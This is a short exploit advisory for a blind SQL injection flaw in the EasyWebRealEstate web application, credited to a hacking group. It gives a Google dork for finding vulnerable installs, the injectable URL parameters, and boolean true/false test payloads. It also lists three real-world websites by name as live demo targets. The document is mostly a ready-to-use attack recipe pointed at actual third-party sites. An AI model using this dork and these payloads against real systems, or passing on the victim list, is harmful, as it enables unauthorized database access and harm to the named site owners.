############################################################################ # Exploit Title: EasyWebRealEstate Blind SQL Injection Vulnerabilitiy # Google Dork: inurl:listings.php "Powered by EasyWebRealEstate" # Date: 4/1/2012 # Author: H4ckCity Security Team # Discovered By: farbodmahini # Home: WwW.H4ckCity.Org # Software Link: www.easywebrealestate.com # Version: All Version # Category:: webapps # Security Risk:: High # Tested on: GNU/Linux Ubuntu - Windows Server - win7 ############################################################################ # Exploit: # # # http://[target]/[patch]/listings.php?lstid=1 [Blind SQL] # http://[target]/[patch]/index.php?current=tip&infoid=9' [Blind SQL] # # # Test Blind SQL Injection: # # # [-] False # # http://[target]/[patch]/listings.php?lstid=1 and 1=0 # # [+] True # # http://[target]/[patch]/listings.php?lstid=1 and 1=1 # # Demo: # # http://www.patcleatorhomes.com/ezweb/listings.php?lstid=210 [Blind SQL] # http://thecaplanteam.com/ezweb/listings.php?lstid=21 [Blind SQL] # http://www.wildernesscamps.ca/ezweb/listings.php?lstid=194 # # ############################################################################ # Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R- # IrIsT-K0242-P0W3RFU7-Mr.M4st3r-Higher_Sense ,... ############################################################################ GreetZ : All H4ckCity Member - BHG Members ############################################################################